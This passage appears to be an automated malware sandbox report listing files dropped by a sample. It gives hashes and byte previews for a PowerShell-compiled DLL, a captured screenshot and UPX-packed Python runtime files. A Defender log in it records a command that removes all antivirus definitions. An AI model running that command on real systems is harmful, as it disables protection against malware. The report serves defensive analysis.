Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

C:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.106013622458142
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryUlak7Ynqq/KPN5Dlq5J:+RI+ycuZhNOlakS/KPNnqX
MD5:	92B377F638DF97BD21D080B748C3D07E
SHA1:	69E040E28E2C19E4475385ECDB21AEAAAF6DD18F
SHA-256:	28B75BD8AE4CB4CE2432E5A1AECF338FF016B17B7D20E8974C0939F583ADFB90
SHA-512:	782B98E25B7DC9520EF7C876ABA66E6E204E7B13D61DBD2DFBEB71A3BB6939CBEE7C4CB446D4BDC6B49A8EAB7668E26503B78957A535B0179DFBC020428C8B12
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.z.1.1.l.1.t.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.z.1.1.l.1.t.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\? ? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	401989
Entropy (8bit):	7.945553079777195
Encrypted:	false
SSDEEP:	12288:oONqoBQKBZDhHOy9pdbv0a4biMirYHVMfk:HNBQKJOWpdbvx8258
MD5:	6BBE2B79BEF61A8EF3B21F694359531C
SHA1:	4CA37D47990FFFDCE53B237E183BCF953F33A582
SHA-256:	C329879F5A13224E4A974C97CE8D1509235490DE934FFDFAD4BE8B232BDA81FA
SHA-512:	F5CECD3F87FDDBDCDB5407EB397A554E9531A1BEC8793A5B0E14F2573C6D9CAC2C4C9D01561C9EB8D21C54839AA5B9BEF42A191A388C483D71E54754CF9D4402
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w...y..^..(6c..YE....%).H.6..i.,.$.-...6.i.H.'.,..{..Q..P.T..M..{#.R.L...no.=.....{.<..M.L..........Df...\|.R...P...P..PY..PY.Y.Py.g....o....'7O...3..t....8.1...D....m%F..$..9-o3..:......4.......1q.....g....\|7To.A....P.....zW.._F~......?......@w..}P.K..'..q....8.;..9..........uSM.._.E.S../..&I...=:.j7.lz...SJ..?.....O.......................1...A..q.>.m..8...r..........6.k..P../.._D...0....^cj..~]A..c}...q.......~!.r.}o....+a.8..>....\.....`..}!................^..P..s.z.gC..S.....{.u...6.}#..>.1mR...../.+....(..<.._K........W\|64...\.<.].Z.z..k...W.yc..%.."..<.{..z.+)._...W..K_..K.....W.k.r.K._......u#v,)u....:._...WR......./.s^\|<A.h...X.Ql.(_...D..b.>q.../\|9Q.G].8.....^.../.....~#.UW.k..6.. .k..K:xA.s~l[...T....o..P_........v.m.....:.\|e.P]v4..,}!....h..4G3..`..P.#..O.CJyN...~.x-....}]..uY.oE..U.k..jK.....s....>..ql.....3..([...Q;s.e.

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.11947640459453
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrB+5k9+MlWlLehW51IC4+I:QOaqdmOFdjr4e+kWResLIAI
MD5:	8A8CC56A980E6B8871366536FAD4430E
SHA1:	62A90BEBE168D3C90AC2BBBE8BA0A277165435A8
SHA-256:	0A57BACB08D20A0FB608922253D6FDD63944616D8E856F3E83EF6785D59F2516
SHA-512:	1ADB340184D48274BBDEDADE9B2A5C29E50DD8E6A90C3B7247A75E922EFEE7F726C8D237E482215C0C95E452ED942B768969A6B0F961A5FC711D44B0957C508B
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. D.e.c. .. 0.5. .. 2.0.2.4. .1.3.:.3.7.:.0.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. D.e.c. .. 0.5. .. 2.0.2.4. .1.3.:.3.7.:.0.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RES1CC2.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Thu Dec 5 19:55:28 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.128150637053972
Encrypted:	false
SSDEEP:	24:HOFq9s+fNazEFUDfHYwKef/hNII+ycuZhNOlakS/KPNnqS+d:ugNazEFSHKCZu1ul6a3+qSe
MD5:	3E118F169D78BC8286830E918300A573
SHA1:	E76E27BDBBF5A5A772C4A1A2C257F6CD78D06458
SHA-256:	DAF65D57218B44EE97084B39E72AD085CF3D720BCE5AE97D33C37DC45800ED2B
SHA-512:	6D0003DD10AFA821DE048515499F5A2BAF4121DAB5498C245DF8856376F8B14CE988CB46E9137F9AFFC7DD2EF413FBAED6ACE9726443EF99065F1D256B8E6146
Malicious:	false
Reputation:	unknown
Preview:	L...0.Rg.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP.................w.8..!..H..~..........4.......C:\Users\user\AppData\Local\Temp\RES1CC2.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.z.1.1.l.1.t.q...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\_MEI43362\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	119192
Entropy (8bit):	6.6016214745004635
Encrypted:	false
SSDEEP:	1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
MD5:	BE8DBE2DC77EBE7F88F910C61AEC691A
SHA1:	A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
SHA-256:	4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
SHA-512:	0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI43362\_bz2.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49944
Entropy (8bit):	7.794461012406033
Encrypted:	false
SSDEEP:	768:tA0qhtL6ugh0BoGmZ0zlTUjZomYtgHQmchmz1NqRR0opjsIMCVy0I5YiSyvFAMx7:tAX76ZKBT+jjvQlRnsIMCVyH7SyVx7
MD5:	ADAA3E7AB77129BBC4ED3D9C4ADEE584
SHA1:	21AABD32B9CBFE0161539454138A43D5DBC73B65
SHA-256:	A1D8CE2C1EFAA854BB0F9DF43EBCCF861DED6F8AFB83C9A8B881904906359F55
SHA-512:	B73D3ABA135FB5E0D907D430266754DA2F02E714264CD4A33C1BFDEDA4740BBE82D43056F1A7A85F4A8ED28CB7798693512B6D4CDB899CE65B6D271CF5E5E264
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d....b.f.........." ...(............Pu....................................................`.............................................H....................0..D..................................................P...@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\_ctypes.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60696
Entropy (8bit):	7.838921842803249
Encrypted:	false
SSDEEP:	1536:XGd2xRPNLaGFQFjd9MuCRL5o1kGIMLPSj7SyKxw:WMxVhFyjd9MDmtIMLPSjr
MD5:	0F090D4159937400DB90F1512FDA50C8
SHA1:	01CBCB413E50F3C204901DFF7171998792133583
SHA-256:	AE6512A770673E268554363F2D1D2A202D0A337BAF233C3E63335026D223BE31
SHA-512:	151156A28D023CF68FD38CBECBE1484FC3F6BF525E7354FCCED294F8E479E07453FD3FC22A6B8D049DDF0AD6306D2C7051ECE4E7DE1137578541A9AABEFE3F12
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d...eb.f.........." ...(.....................................................P............`.........................................HL.......I.......@.......................L...................................... :..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@..............................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\_decimal.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	110360
Entropy (8bit):	7.933674633852228
Encrypted:	false
SSDEEP:	3072:ATZr2oqnOtykg54lBjYOI6T+62Mnaf9KLKuV8obLFWaIMOqM7ZdD:qonr9SlB0vsNfaluLH/8/7XD
MD5:	A592BA2BB04F53B47D87B4F7B0C8B328
SHA1:	CA8C65AB0AAB0F98AF8CC1C1CF31C9744E56A33C
SHA-256:	19FE4A08B0B321FF9413DA88E519F4A4A4510481605B250F2906A32E8BB14938
SHA-512:	1576FDC90D8678DA0DAB8253FDD8EC8B3CE924FA392F35D8C62207A85C31C26DAE5524E983E97872933538551CBEF9CD4BA9206BCD16F2AE0858AB11574D09E0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d...[b.f.........." ...(.p...................................................@............`..........................................<..P....9.......0...........&...........=.......................................+..@...........................................UPX0....................................UPX1.....p.......n..................@....rsrc........0.......r..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\_hashlib.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	7.673459345767737
Encrypted:	false
SSDEEP:	768:9ZxZoP6y3dGOWmmDFYCppejnIMOInQ5YiSyvqAMxkEq:91jOWpDFujnIMOInC7SyAx2
MD5:	4DD4C7D3A7B954A337607B8B8C4A21D1
SHA1:	B6318B830D73CBF9FA45BE2915F852B5A5D81906
SHA-256:	926692FCECDB7E65A14AC0786E1F58E880EA8DAE7F7BB3AA7F2C758C23F2AF70
SHA-512:	DAB02496C066A70A98334E841A0164DF1A6E72E890CE66BE440B10FDEECDFE7B8D0EC39D1AF402AE72C8AA19763C92DD7404F3A829C9FDCF871C01B1AED122E1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8QtZY?'ZY?'ZY?'S!.'^Y?'..>&XY?'..<&YY?'..;&RY?'..:&VY?'.!>&XY?'O.>&_Y?'ZY>'.Y?'O.2&[Y?'O.?&[Y?'O..'[Y?'O.=&[Y?'RichZY?'........PE..d....b.f.........." ...(.P...........!.......................................@............`.........................................\|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\_lzma.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88344
Entropy (8bit):	7.925386593593091
Encrypted:	false
SSDEEP:	1536:IGMIb+tRn8VHPoUBL9ZEL7qzf7+pW4AHjI1xh4hBpOVIMZ1JM7Syqxy:oWgRsHPoUVwqzf7+mHjWxGUIMZ1JML
MD5:	17082C94B383BCA187EB13487425EC2C
SHA1:	517DF08AF5C283CA08B7545B446C6C2309F45B8B
SHA-256:	DDBFEF8DA4A0D8C1C8C24D171DE65B9F4069E2EDB8F33EF5DFECF93CB2643BD4
SHA-512:	2B565D595E9A95AEFAE396FC7D66EE0AEB9BFE3C23D64540BA080BA39A484AB1C50F040161896CCA6620C182F0B02A9DB677DAB099DCA3CAE863E6E2542BB12C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d....b.f.........." ...(. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\_queue.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26904
Entropy (8bit):	7.472682734205639
Encrypted:	false
SSDEEP:	768:pX+wITsyt4xW6MwmTMp5HIMQUnH5YiSyvMcAMxkEm2j:Mj4z7YqHIMQUnZ7SyVxb
MD5:	97CC5797405F90B20927E29867BC3C4F
SHA1:	A2E7D2399CCA252CC54FC1609621D441DFF1ACE5
SHA-256:	FB304CA68B41E573713ABB012196EF1AE2D5B5E659D846BBF46B1F13946C2A39
SHA-512:	77780FE0951473762990CBEF056B3BBA36CDA9299B1A7D31D9059A792F13B1A072CE3AB26D312C59805A7A2E9773B7300B406FD3AF5E2D1270676A7862B9CA48
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d...`b.f.........." ...(.0.......... .....................................................`.............................................L.......P............`..............<....................................... ...@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\_socket.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45336
Entropy (8bit):	7.718752299192271
Encrypted:	false
SSDEEP:	768:zN6akbHvkpgRFeTWraC7I5ubIFpoO5IMLwyBu5YiSyvYEAMxkEIWN:z8akHrRFeTWrdI5uMoO5IMLwyBE7Sygs
MD5:	F52C1C015FB147729A7CAAB03B2F64F4
SHA1:	8AEBC2B18A02F1C6C7494271F7F9E779014BEE31
SHA-256:	06D91AC02B00A29180F4520521DE2F7DE2593DD9C52E1C2B294E717C826A1B7D
SHA-512:	8AB076C551F0A6FFE02C26B4F0FBB2EA7756D4650FE39F53D7BD61F4CB6AE81460D46D8535C89C6D626E7C605882B39843F7F70DD50E9DAF27AF0F8CADD49C0F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c\|.Nb}g.a\|.Nb}g.f\|.Nb}g.g\|.Nb}..c\|.Nb}.Nc}.Nb}.6c\|.Nb}..o\|.Nb}..b\|.Nb}..}.Nb}..`\|.Nb}Rich.Nb}................PE..d....b.f.........." ...(.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\_sqlite3.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59160
Entropy (8bit):	7.857087754447377
Encrypted:	false
SSDEEP:	1536:f063sNIsNgSIOB2nMCbGV5SQpvX8Fyi6sdSIMOQif7SyJxl:fLHr4VD7dv8r6s0IMOQif3
MD5:	37A88A19BB1DE9CF33141872C2C534CB
SHA1:	A9209EC10AF81913D9FD1D0DD6F1890D275617E8
SHA-256:	CCA0FBE5268AB181BF8AFBDC4AF258D0FBD819317A78DDD1F58BEF7D2F197350
SHA-512:	3A22064505B80B51EBAA0D534F17431F9449C8F2B155EC794F9C4F5508470576366ED3BA5D2DE7DDF1836C6E638F26CAD8CB0CC496DAF30EE38CA97557238733
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M..#..#..#.....#..1"..#..1..#..1 ..#..1'...#..1&..#..6"..#..."..#.."..#..6....#..6#..#..6..#..6!..#.Rich.#.........................PE..d....b.f.........." ...(.........p..`........................................@............`..........................................;..P....9.......0..........D............;......................................`&..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\_ssl.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	67864
Entropy (8bit):	7.8470211975704105
Encrypted:	false
SSDEEP:	1536:BzC9S4THQvkF5SM7f8bQMAjsNVw3daUjNIMC7Z1s7SyS6xT:BspTRf8ejsNWRIMC7ZSD
MD5:	34402EFC9A34B91768CF1280CC846C77
SHA1:	20553A06FE807C274B0228EC6A6A49A11EC8B7C1
SHA-256:	FE52C34028C5D62430EA7A9BE034557CCFECDDDDA9C57874F2832F584FEDB031
SHA-512:	2B8A50F67B5D29DB3E300BC0DD670DAD0BA069AFA9ACF566CAD03B8A993A0E49F1E28059737D3B21CEF2321A13EFF12249C80FA46832939D2BF6D8555490E99C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|..j8.98.98.91.09>.9._.8:.9._.8;.9._.80.9._.85.9-X.8>.98.9..9s..8?.9-X.8:.9-X.89.9-X\99.9-X.89.9Rich8.9........................PE..d....b.f.........." ...(.........@.......P...................................0............`.........................................l,..d....)....... ..........P............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22112
Entropy (8bit):	4.744270711412692
Encrypted:	false
SSDEEP:	192:zFOhcWqhWpvWEXCVWQ4iWwklRxwVIX01k9z3AROVaz4ILS:zFlWqhWpk6R9zeU0J2
MD5:	E8B9D74BFD1F6D1CC1D99B24F44DA796
SHA1:	A312CFC6A7ED7BF1B786E5B3FD842A7EEB683452
SHA-256:	B1B3FD40AB437A43C8DB4994CCFFC7F88000CC8BB6E34A2BCBFF8E2464930C59
SHA-512:	B74D9B12B69DB81A96FC5A001FD88C1E62EE8299BA435E242C5CB2CE446740ED3D8A623E1924C2BC07BFD9AEF7B2577C9EC8264E53E5BE625F4379119BAFCC27
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.602255667966723
Encrypted:	false
SSDEEP:	192:NWqhWEWEXCVWQ4cRWvBQrVXC4dlgX01k9z3AUj7W6SxtR:NWqhWPlZVXC4deR9zVj7QR
MD5:	CFE0C1DFDE224EA5FED9BD5FF778A6E0
SHA1:	5150E7EDD1293E29D2E4D6BB68067374B8A07CE6
SHA-256:	0D0F80CBF476AF5B1C9FD3775E086ED0DFDB510CD0CC208EC1CCB04572396E3E
SHA-512:	B0E02E1F19CFA7DE3693D4D63E404BDB9D15527AC85A6D492DB1128BB695BFFD11BEC33D32F317A7615CB9A820CD14F9F8B182469D65AF2430FFCDBAD4BD7000
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.606873381830854
Encrypted:	false
SSDEEP:	192:T0WqhWnWEXCVWQ4mW5ocADB6ZX01k9z3AkprGvV:T0WqhW8VcTR9zJpr4V
MD5:	33BBECE432F8DA57F17BF2E396EBAA58
SHA1:	890DF2DDDFDF3EECCC698312D32407F3E2EC7EB1
SHA-256:	7CF0944901F7F7E0D0B9AD62753FC2FE380461B1CCE8CDC7E9C9867C980E3B0E
SHA-512:	619B684E83546D97FC1D1BC7181AD09C083E880629726EE3AF138A9E4791A6DCF675A8DF65DC20EDBE6465B5F4EAC92A64265DF37E53A5F34F6BE93A5C2A7AE5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@...........`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.65169290018864
Encrypted:	false
SSDEEP:	192:qzmxD3T4qLWqhW2WJWadJCsVWQ4mW/xNVAv+cQ0GX01k9z3ARoanSwT44:qzQVWqhWTCsiNbZR9zQoUSwTJ
MD5:	EB0978A9213E7F6FDD63B2967F02D999
SHA1:	9833F4134F7AC4766991C918AECE900ACFBF969F
SHA-256:	AB25A1FE836FC68BCB199F1FE565C27D26AF0C390A38DA158E0D8815EFE1103E
SHA-512:	6F268148F959693EE213DB7D3DB136B8E3AD1F80267D8CBD7D5429C021ADACCC9C14424C09D527E181B9C9B5EA41765AFF568B9630E4EB83BFC532E56DFE5B63
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI43362\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\chost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26216
Entropy (8bit):	4.866487428274293
Encrypted:	false
SSDEEP:	192:gaNYPvVX8rFTsCWqhWVWEXCVWQ4mWPJlBLrp0KBQfX01k9z3ALkBw:WPvVX8WqhWiyBRxB+R9z2kBw
